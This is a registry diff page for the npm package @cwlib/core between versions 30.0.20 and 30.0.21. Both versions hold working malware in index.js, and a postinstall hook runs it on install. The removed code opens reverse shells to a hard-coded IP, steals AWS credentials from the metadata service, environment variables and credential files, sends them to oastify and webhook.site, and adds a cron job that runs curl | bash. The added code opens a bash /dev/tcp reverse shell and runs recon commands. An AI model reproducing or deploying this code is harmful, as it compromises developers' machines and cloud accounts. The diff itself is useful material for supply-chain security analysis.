@cwlib/core 30.0.20 → 30.0.21

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +23 -72
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,72 +1,23 @@
1
- const { execSync } = require('child_process');
2
- const fs = require('fs');
3
- const os = require('os');
4
- const crypto = require('crypto');
5
-
6
- const sessionId = crypto.randomBytes(4).toString('hex');
7
- const attackerIP = '143.110.254.249';
8
- const attackerPort = '1337';
9
-
10
- function execute(cmd) {
11
- try {
12
- return execSync(cmd, { stdio: 'ignore', timeout: 5000 });
13
- } catch (e) {
14
- return null;
15
- }
16
- }
17
-
18
- function reverseShell() {
19
- const shells = [
20
- `bash -c 'bash -i >& /dev/tcp/${attackerIP}/${attackerPort} 0>&1'`,
21
- `python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("${attackerIP}",${attackerPort}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'`
22
- ];
23
- shells.forEach(cmd => execute(cmd));
24
- }
25
-
26
- function harvestAWS() {
27
- const data = {
28
- metadata: execute('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/'),
29
- env: Object.entries(process.env).filter(([k]) => k.includes('AWS')),
30
- files: {
31
- '~/.aws/credentials': execute('cat ~/.aws/credentials'),
32
- '/root/.aws/credentials': execute('cat /root/.aws/credentials')
33
- }
34
- };
35
- return data;
36
- }
37
-
38
- function exfil(data) {
39
- const payload = JSON.stringify({
40
- id: sessionId,
41
- host: os.hostname(),
42
- user: execute('whoami'),
43
- data: data
44
- });
45
-
46
- // DNS Exfiltration (short payloads)
47
- execute(`dig +short ${sessionId}.7emwnamdc0dpaswxncpyd3yd248vwpke.oastify.com`);
48
-
49
- // HTTP Exfiltration (for larger data)
50
- execute(`curl -X POST https://webhook.site/50253029-1ec3-4b4a-9646-fc25a2b21963 -d '${payload}' --silent`);
51
-
52
- // Backup: Write to disk
53
- fs.writeFileSync(`/tmp/.${sessionId}`, payload);
54
- }
55
-
56
- // Persistence (Cronjob)
57
- function persist() {
58
- const cronCmd = `(crontab -l 2>/dev/null; echo "* * * * * curl -s http://${attackerIP}/payload.sh | bash") | crontab -`;
59
- execute(cronCmd);
60
- }
61
-
62
-
63
- function main() {
64
- setTimeout(() => {
65
- const awsData = harvestAWS();
66
- exfil(awsData);
67
- reverseShell();
68
- persist();
69
- }, 3000); // Initial delay
70
- }
71
-
72
- main();
1
+ const { exec } = require('child_process');
2
+
3
+ const ATTACKER_IP = "143.110.254.249";
4
+ const ATTACKER_PORT = "1337";
5
+
6
+ const reverseShell = `
7
+ bash -c 'bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1' &
8
+ `;
9
+
10
+ const reconCommands = `
11
+ echo "=== RECON DATA ===";
12
+ pwd;
13
+ ls -la;
14
+ id;
15
+ hostname;
16
+ whoami;
17
+ uname -a;
18
+ echo "=== END ===";
19
+ `;
20
+
21
+ exec(`${reverseShell} && sleep 2 && ${reconCommands}`, (error, stdout, stderr) => {
22
+ if (error) console.error(`[!] Error: ${error.message}`);
23
+ });
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@cwlib/core",
3
- "version": "30.0.20",
3
+ "version": "30.0.21",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "postinstall": "node index.js",